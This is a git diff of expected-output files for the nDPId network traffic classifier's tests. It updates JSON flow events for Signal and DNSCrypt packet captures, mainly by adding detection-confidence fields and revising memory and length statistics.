+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1569051264073,"flow_last_seen":1569051267100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4493,"flow_avg_l4_payload_len":179,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":265,"flow_first_seen":1569051267121,"flow_last_seen":1569051267601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":198733,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","total-events-serialized":136}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 637/637
@@ -142,10 +142,10 @@
 ~~ total active/idle flows...: 19/19
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4692562 bytes
-~~ total memory freed........: 4692562 bytes
-~~ total allocations/frees...: 100328/100328
+~~ total memory allocated....: 4771611 bytes
+~~ total memory freed........: 4771611 bytes
+~~ total allocations/frees...: 101918/101918
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 1323 chars
-~~ json string avg len.......: 812 chars
+~~ json string max len.......: 1420 chars
+~~ json string avg len.......: 861 chars
diff --git a/test/results/simple-dnscrypt.pcap.out b/test/results/simple-dnscrypt.pcap.out
index 0aec88cfa..aab551f43 100644
--- a/test/results/simple-dnscrypt.pcap.out
+++ b/test/results/simple-dnscrypt.pcap.out
@@ -3,9 +3,9 @@
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491813284555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1491813284555,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PRVAAIAGMNDAqCunhncaGMQ5Abvf\/XrjAAAAAIACIAChWwAAAgQFtAEDAwgBAQQC"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491813284666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1491813284666,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xDnBW87r3\/165IASchC\/iQAAAgQFHgEBBAIBAwMH"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491813284666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1491813284666,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPRZAAIAGMNvAqCunhncaGMQ5Abvf\/XrkwVvO7FAQAEBxlgAA"}
-00812{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813284555,"flow_last_seen":1491813284694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1491813284694,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00869{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813284555,"flow_last_seen":1491813284804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1516,"flow_avg_l4_payload_len":252,"midstream":0,"ts_msec":1491813284804,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01223{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1491813284555,"flow_last_seen":1491813284819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6756,"flow_avg_l4_payload_len":614,"midstream":0,"ts_msec":1491813284819,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}}
+00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813284555,"flow_last_seen":1491813284694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1491813284694,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00895{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813284555,"flow_last_seen":1491813284804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1516,"flow_avg_l4_payload_len":252,"midstream":0,"ts_msec":1491813284804,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01249{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1491813284555,"flow_last_seen":1491813284819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6756,"flow_avg_l4_payload_len":614,"midstream":0,"ts_msec":1491813284819,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286275,"flow_last_seen":1491813286275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1491813286275,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491813286275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1491813286275,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSdAAIAGML7AqCunhncaGMRNAbtYb9jbAAAAAIACIADK3QAAAgQFtAEDAwgBAQQC"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286392,"flow_last_seen":1491813286392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1491813286392,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -14,23 +14,23 @@
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1491813286393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1491813286393,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSlAAIAGMLzAqCunhncaGMRTAbtepcAHAAAAAIACIADddQAAAgQFtAEDAwgBAQQC"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491813286463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1491813286463,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xE3jDV\/XWG\/Y3IASchA2bgAAAgQFHgEBBAIBAwMH"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491813286463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1491813286463,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSpAAIAGMMfAqCunhncaGMRNAbtYb9jc4w1f2FAQAEDoegAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286275,"flow_last_seen":1491813286464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1491813286464,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286275,"flow_last_seen":1491813286464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1491813286464,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1491813286470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1491813286470,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADUGuOWGdxoYwKgrpwG7xFOF+CiKXqXACIASchDdaAAAAgQFHgEBBAIBAwMH"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1491813286470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1491813286470,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSxAAIAGMMXAqCunhncaGMRTAbtepcAIhfgoi1AQAECPdQAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286393,"flow_last_seen":1491813286470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1491813286470,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286393,"flow_last_seen":1491813286470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1491813286470,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1491813286489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1491813286489,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xFKVdKj9XuwOhIASchD+twAAAgQFHgEBBAIBAwMH"}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1491813286489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1491813286489,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPS5AAIAGMMPAqCunhncaGMRSAbte7A6ElXSo\/lAQAECwxAAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286392,"flow_last_seen":1491813286491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1491813286491,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286393,"flow_last_seen":1491813286573,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"ts_msec":1491813286573,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01223{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286393,"flow_last_seen":1491813286577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"ts_msec":1491813286577,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}}
-00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286275,"flow_last_seen":1491813286586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"ts_msec":1491813286586,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01223{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286275,"flow_last_seen":1491813286594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"ts_msec":1491813286594,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}}
-00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":81,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286392,"flow_last_seen":1491813286609,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"ts_msec":1491813286609,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
